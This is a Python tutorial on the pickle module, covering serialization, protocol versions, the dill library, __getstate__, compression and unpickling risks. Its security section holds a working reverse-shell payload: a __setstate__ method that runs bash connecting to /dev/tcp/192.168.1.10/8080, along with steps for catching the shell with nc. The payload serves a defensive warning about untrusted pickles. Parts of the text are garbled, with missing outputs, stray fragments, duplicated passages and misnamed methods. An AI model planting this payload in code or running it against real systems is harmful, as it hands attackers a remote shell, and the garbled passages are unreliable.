Pickle Module of Python

To save the internal state of their objects for later use, developers may occasionally want to communicate complicated object commands across the network. The serialization procedure, supported by the standard library due to Python's Pickle Module, can be used by the developer to accomplish this.

We'll talk about serializing and deserializing objects in this tutorial and which Python package users should use to serialize objects. The Python Pickle module can be used to serialize the type of objects. We'll also go through how to use the Pickle module to serialize object hierarchies and what dangers a developer can face when deserializing an object from an unreliable source.

Python Serialization

The data structure is transformed into a linear form that may be stored or transferred across the network during serialization.

Python's serialization feature enables programmers to turn a complex object structure into a stream of bytes that can be sent over the network or stored in a disc. The technique can be referred to as marshaling by the developer. In contrast, deserialization is the opposite of serialization, involving the user's transforming a stream of bytes into a data structure. This procedure is known as unmarshalling.

Serialization is a tool that developers can utilize in many different contexts. One is the neural network's internal state being saved after processing the training phase so that it may be used later and the training will not be repeated.

The standard Python library has three modules that let programmers serialize and deserialize objects:

The pickle module
The marshal module
The json module

For serializing the objects, developers can utilize Python, which also supports XML.

Out of the three, the json Module is the most recent. This enables the developer to collaborate with standard JSON files. The best and most used format for exchanging data is json.

The JSON format is preferred for a variety of reasons, including:

Humans can read it
It is linguistically unrestricted.
More lightweight than XML

The developer can serialize and deserialize a variety of common Python types using the json Module:

List
Dict
String
Int
Tuple
Bool
Float
None

The marshal module is the oldest of these three modules. Its primary function is reading and writing. py files the developer receives when the Python module is imported by the interpreter, which is the compiled bytecode of Python modules. As a result, although the developer can use the marshal module to serialize the object, doing so is not advised.

Another way to serialize and deserialize Python objects is with the pickle package. As opposed to the json module, this is distinct. The object is serialized in a binary format, which produces unintelligible data for human beings. It can work with many different Python types, including developer-defined custom objects, and is faster than the others.

Therefore, the developer has many options for serializing and deserializing Python objects. The following three criteria are crucial for determining which approach is appropriate in the developer's situation:

The marshal module shouldn't be used as the interpreter is the primary user of it. According to the official documentation, the Python format can be changed in backward-incompatible ways.
XML and JSON are great options if the developer requires compatibility with several languages and a human-readable format.
The Python pickle module is the ideal option for all the remaining scenarios. Let's say the developer prefers a proprietary interoperable format over a standard human-readable format.

And they demand that the customized objects be serialized. The pickle module is the next option available.

Inside picking Module

Python's pickle module includes the following four methods:

dump( obj, file, protocol = None, * , fix_imports = True, buffer_callback = None)
dumps( obj, protocol = None, * , fix_imports = True, buffer_callback = None)
load( file, * , fix_imports = True, encoding = " ASCII ", errors = "strict ", buffers = None)
loads( bytes_object, * , fix_imports = True, encoding = " ASCII ", errors = " strict ", buffers = None)

The pickling process is carried out using the first two ways, and the unpickling process is carried out using the following two methods.

Between dump() and dumps(), the former creates a file with the serialization results, while the latter returns a string.

The developer can keep in mind that "s" stands for the string in the dumps() function to distinguish it from the dump().

The functions load() and loads() can be used similarly. The loads() function manipulates the string, whereas the load() function reads the file for the unpickling procedure.

Assume that the user has developed a custom class called forexample_class with a variety of characteristics, all of which are of various types:

The_number
The_string
The_list
The_dictionary
The_tuple

The following example demonstrates how to create an instance of the class and pickle it to obtain a plain string for usage by the user. The pickled string won't be affected if the user changes the value of the class's attributes after it has been pickled. The user can then restore the copy of the pickled class and unpickle the string that had been pickled earlier in another variable.

Example:

# pickle.py
import pickle

class forexample_class:
    the_number = 25
    the_string = " hello"
    the_list = [ 1, 2, 3 ]
    the_dict = { " first ": " a ", " second ": 2, " third ": [ 1, 2, 3 ] }
    the_tuple = ( 22, 23 )

user_object = forexample_class()

user_pickled_object = pickle.dumps( user_object )  # here, user is Pickling the object
print( f" This is user's pickled object: \n { user_pickled_object } \n " )

user_object.the_dict = None

user_unpickled_object = pickle.loads( user_pickled_object )  # here, user is Unpickling the object
print(
    f" This is the_dict of the unpickled object: \n { user_unpickled_object.the_dict } \n " )

Output:

This is user's pickled object: 
 b' \x80 \x04 \x95$ \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x8c \x08__main__ \x94 \x8c \x10forexample_class \x94 \x93 \x94) \x81 \x94. ' 
 
 This is the_dict of the unpickled object: 
 {' first ': ' a ', ' second ': 2, ' third ': [ 1, 2, 3 ] }

Explanation

Here, the process of pickling has ended correctly, and it stores the user's whole instance in the string: b' \x80 \x04 \x95$ \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x8c \x08__main__ \x94 \x8c \x10forexample_class \x94 \x93 \x94) \x81 \x94. 'After completing the process of pickling, the user can change their original objects making the_dict attribute equals to None.

The user can now unpick the string and create an entirely new instance when the user receives an exact duplicate of the object's original structure dating back to the start of the pickling process.

Python's Pickle Module Protocol Formats

The pickle module is unique to Python; only another program may read its output. The developer should know that the pickle module is currently advanced, even if they may be using Python.

Accordingly, if the developer pickled the object with a specific Python version, they might be unable to unpickle it with an earlier version.

The Pickle module of Python supports six different protocols. According to how high the protocol version is, it is necessary to unpickle the most recent Python interpreter.

Version 0 of the protocol was the initial release. It can be read by humans, unlike other protocols.
Version 1 of the protocol was the first to use a binary format.
Version 2 of the protocol was introduced in Python 2.3.
Version 3 of the protocol was included in Python 3.0. Python 2. x is unable to unpickle it.
Version 4 of the protocol was introduced in Python 3.4. Starting with Python 3.8 is the default protocol and offers support for various object sizes and types.
Version 5 of the protocol was introduced in Python 3.8.

Pickleable and Unpickable Types

Although not all kinds can be pickled, we've already spoken about how Python's pickle module can serialize many more types than the json module.

In addition to database connections, active threads, open network sockets, and many more, the list of unpickable objects includes these items.

There aren't many options available to the user if they find themselves trapped with unpickable objects. The first choice available to them is to use a third-party library like Dill.

The dill library can increase the pickle's capabilities. With the help of this library, users can serialize fewer common kinds, including nested functions, lambdas, functions with yields, and many more.

The user might attempt to pickle the lambda function to test this Module.

For example:

import pickle  
squaring = lambda x: x * x  
user_pickle = pickle.dumps( squaring )

The Python pickle module cannot serialize the lambda function, so if the user tries to run this code, they will receive an exception.

Output:

PicklingError                             Traceback (most recent call last)
<ipython-input-9-1141f36c69b9> in <module>
      3 
      4 squaring = lambda x : x * x
----> 5 user_pickle = pickle.dumps(squaring)

PicklingError: Can't pickle <function <lambda> at 0x000001F1581DEE50>: attribute lookup <lambda> on __main__ failed

The user may now see the difference if they swap out the pickle module for the dill library.

For Example:

# pickle_dill.py
import dill

squaring = lambda x: x * x
user_pickle = dill.dumps( squaring )
print( user_pickle )

Output:

b' \x80 \x04 \x95 \xb2 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x8c \ndill._dill \x94 \x8c \x10_create_function \x94 \x93 \x94 ( h \x00 \x8c \x0c_create_code \x94 \x93 \x94 ( K \x01K \x00K \x00K \x01K \x02KCC \x08| \x00| \x00 \x14 \x00S \x00 \x94N \x85 \x94 ) \x8c \x01x \x94 \x85 \x94 \x8c \x1f< ipython-input-11-30f1c8d0e50d > \x94 \x8c \x08< lambda > \x94K \x04C \x00 \x94 ) )t \x94R \x94c__builtin__ \n__main__ \nh \nNN } \x94Nt \x94R \x94. '

The Dill library also has another intriguing feature: the ability to serialize an entire interpreter session.

For Example:

squaring = lambda x : x * x
p = squaring( 25 )
import math
q = math.sqrt ( 139 )
import dill
dill.dump_session( ' testing.pkl ' )
exit()

In the above example, the user started the interpreter, imported the Module, and then defined the lambda function along with a few other variables. They then imported the dill library and called the dump_session() function for serializing the whole session.

If the user has run the code correctly, they will get the testing.pkl file in their current directory.

Output:

$ ls testing.pkl
4 -rw-r--r--@ 1 dave  staff  493 Feb  12 09:52 testing.pkl

Now, the user can start the new instance of the interpreter and load the testing.pkl file for resorting to their last session.

For example:

Output:

dict_items( [ ( ' __name__ ' , ' __main__ ' ) , ( ' __doc__ ' , ' Automatically created module for IPython interactive environment ' ) , ( ' __package__ ' , None ) , ( ' __loader__ ' , None ) , ( ' __spec__ ' , None ) , ( ' __builtin__ ' , < module ' builtins ' ( built-in ) > ) , ( ' __builtins__ ' , < module ' builtins ' ( built-in ) > ) , ( ' _ih ' , [ ' ' , ' globals().items() ' ] ) , ( ' _oh ' , {} ) , ( ' _dh ' , [ ' C:\\Users \\User Name \\AppData \\Local \\Programs \\Python \\Python39 \\Scripts ' ] ) , ( ' In ' , [ ' ' , ' globals().items() ' ] ) , ( ' Out ' , {} ) , ( ' get_ipython ' , < bound method InteractiveShell.get_ipython of < ipykernel.zmqshell.ZMQInteractiveShell object at 0x000001E1CDD8DDC0 > > ) , ( ' exit ' , < IPython.core.autocall.ZMQExitAutocall object at 0x000001E1CDD9FC70 > ) , ( ' quit ' , < IPython.core.autocall.ZMQExitAutocall object at 0x000001E1CDD9FC70 > ) , ( ' _ ' , ' ' ) , ( ' __ ' , ' ' ) , ( ' ___ ' , ' ' ) , ( ' _i ' , ' ' ) , ( ' _ii ' , ' ' ) , ( ' _iii ' , ' ' ) , ( ' _i1 ' , ' globals().items() ' ) ] )

The user started the interpreter, imported the Module, and then defined the example's lambda function and a few other variables. After importing the dill library, They ran the dump_session() function to serialize the entire session.

The testing. pkl file should be in the user's current directory if the code has been executed properly.

import dill  
dill.load_session( ' testing.pkl ' )  
globals().items()  

Output:

dict_items( [ ( ' __name__ ' , ' __main__ ' ) , ( ' __doc__ ' , ' Automatically created module for IPython interactive environment ' ) , ( ' __package__ ' , None ) , ( ' __loader__ ' , None ) , ( ' __spec__ ' , None ) , ( ' __builtin__ ' , < module ' builtins ' ( built-in ) > ) , ( ' __builtins__ ' , < module ' builtins ' ( built-in ) > ) , ( ' _ih ' , [ ' ' , " squaring = lambda x : x * x \na = squaring( 25 ) \nimport math \nq = math.sqrt ( 139 ) \nimport dill \ndill.dump_session( ' testing.pkl ' ) \nexit() " ] ) , ( ' _oh ' , {} ) , ( ' _dh ' , [ ' C:\\ Users\\ User Name \\AppData \\Local \\Programs \\Python \\Python39 \\Scripts ' ] ) , ( ' In ' , [ ' ' , " squaring = lambda x : x * x \np = squaring( 25 ) \nimport math\nq = math.sqrt ( 139 ) \nimport dill \ndill.dump_session( ' testing.pkl ' ) \nexit() " ] ) , ( ' Out ' , {} ) , ( ' get_ipython ' , < bound method InteractiveShell.get_ipython of < ipykernel.zmqshell.ZMQInteractiveShell object at 0x000001E1CDD8DDC0 > > ) , ( ' exit ' , < IPython.core.autocall.ZMQExitAutocall object at 0x000001E1CDD9FC70 > ) , ( ' quit ' , < IPython.core.autocall.ZMQExitAutocall object at 0x000001E1CDD9FC70 > ) , ( ' _ ' , ' ' ) , ( ' __ ' , ' ' ) , ( ' ___ ' , ' ' ) , ( ' _i ' , ' ' ) , ( ' _ii ' , ' ' ) , ( ' _iii ' , ' ' ) , ( ' _i1 ' , " squaring = lambda x : x * x \np = squaring( 25 ) \nimport math \nq = math.sqrt ( 139 ) \nimport dill \ndill.dump_session( ' testing.pkl ' ) \nexit() " ) , ( ' _1 ' , dict_items( [ ( ' __name__ ' , ' __main__ ' ) , ( ' __doc__ ' , ' Automatically created module for IPython interactive environment ' ) , ( ' __package__ ' , None ) , ( ' __loader__ ' , None ) , ( ' __spec__ ' , None ) , ( ' __builtin__ ' , < module ' builtins ' ( built-in ) > ) , ( ' __builtins__ ' , < module ' builtins ' ( built-in ) > )

Output:

22.0

Output:

(x) >

The initial globals() are here. The developer must import the DILL library and call load_session() to restore their serialized interpreter session as the item() statement indicates that the inter

Peter is in the beginning state.

Developers should remember that the pickle module is not part of the standard library if they use the dill library instead. Compared to the pickle module, it is slower.

Although the Dill library can serialize more objects than the Pickle module, it cannot address every serialization issue a developer can encounter. Developers cannot use the Dill library if they want to serialize an object containing a database connection. The dill library has an unserialized object with that name.

The answer to this issue is to serialize the object without reinitializing the connection after deserializing it.

The developer can specify which objects should be included in the pickling process and other details using the _getstate_() method. The developer can indicate what they wish to pickle using this technique. The _dict_(), a default instance, will be utilized if they do not override _getstate_().

In the example below, the user defined the class with a few attributes before using _getstate_() to exclude one of the attributes from the serialization process.

For Example:

# custom_pickle.py

import pickle

class foobar:
    def __init__( self ):
        self.p = 25
        self.q = " testing "
        self.r = lambda x: x * x

    def __getstate__( self ):
        attribute = self.__dict__.copy()
        del attribute[ 'r' ]
        return attribute

user_foobar_instance = foobar()
user_pickle_string = pickle.dumps( user_foobar_instance )
user_new_instance = pickle.loads( user_pickle_string )

print( user_new_instance.__dict__ )

The user generated the object in the example above with three attributes, one of which is a lambda, an unpickable object for the pickle module. To address this issue, they have defined which attribute to pickle in the _getstate_() function. The user copied the whole instance's _dict_ to define all the class's attributes before deleting the unpickable attribute 'r.'

After running this code and deserializing the object, the user can observe that the new instance lacks the 'r' attribute.

Output:

{'p': 25, 'q': ' testing '}

Pickle Object Compression

Although the pickle data format provides a compact binary representation of the object structure, users can still make their pickle strings more efficient by gzip or bzip2 compression.

The user must use the bz2 module, offered in the standard library of Python, to compress the pickled text with bzip2.

As an illustration, the user will pickle the string before compressing it using the bz2 package.

For Example:

import pickle
import bz2
user_string = """Per me si va ne la citt� dolente,
per me si va ne l'etterno dolore,
per me si va tra la perduta gente.
Giustizia mosse il mio alto fattore:
fecemi la divina podestate,
la somma sapienza e 'l primo amore;
dinanzi a me non fuor cose create
se non etterne, e io etterno duro.
Lasciate ogne speranza, voi ch'intrate."""
pickling = pickle.dumps( user_string )
compressed = bz2.compress( pickling )
len( user_string )

Output:

312
len( compressed )

Output:

The user needs to remember that smaller files mean a slower process.

Concerns about the Pickle Module's security

Up until now, we've talked about using Python's pickle package to serialize and deserialize objects. When a developer wishes to save the state of their objects to disc or send it over the network, serialization is a convenient method.

The Python pickle module is not very secure, which is something more that developers need to be aware of. We have already discussed utilizing the _set state_() function. The unpickling procedure and additional initialization are best performed using this method.

A developer has few options for lowering the risk. The general guideline is that developers should never unpickle data that has been obtained from an unreliable source or sent via an insecure network. The user can use tools like hmac to sign data and ensure that it hasn't been changed to thwart attacks.

For Example:

to observe how exposing the user's system to attackers by unpickling a modified pickle.

# remote.py
import pickle
import os

class foobar:
    def __init__( self ):
        pass

    def __getstate__( self ):
        return self.__dict__

    def __setstate__( self, state ):
        # The attack is from 192.168.1.10
        # The attacker is listening on port 8080
        os.system('/bin/bash -c
                  "/bin/bash -i >& /dev/tcp/192.168.1.10/8080 0>&1"')


user_foobar = foobar()
user_pickle = pickle.dumps( user_foobar )
user_unpickle = pickle.loads( user_pickle )

As an illustration

The _set state_() function, which is invoked by the unpickling process in the example above, will run a Bash command to open the remote shell to the 192.168.1.10 system on port 8080.

The user can test the script on their Mac or Linux machine safely in this way. To list the connection to port 8080, they must first open the terminal and then use the nc command.

For Example:

Attackers will use this terminal.

Then, on the same computer system, the user must open a different terminal and run the Python code to remove the malicious code.

The user must ensure that the IP address in the code is changed to match the IP address of the terminal they are attacking. The shell is made available to the attackers after running the code.

The attacking console will now display a bash shell. Right present, the system being hacked can directly operate this console.

For Example:

Output:

bash: no job control in this shell

The default interactive shell is now zsh.
To update your account to use zsh, please run ` chsh -s /bin /zsh`.
For more details, please visit https://support.apple.com /kb /HT208060.
bash-3.1$

Next TopicHow to convert Bytes to string in Python

← prev next →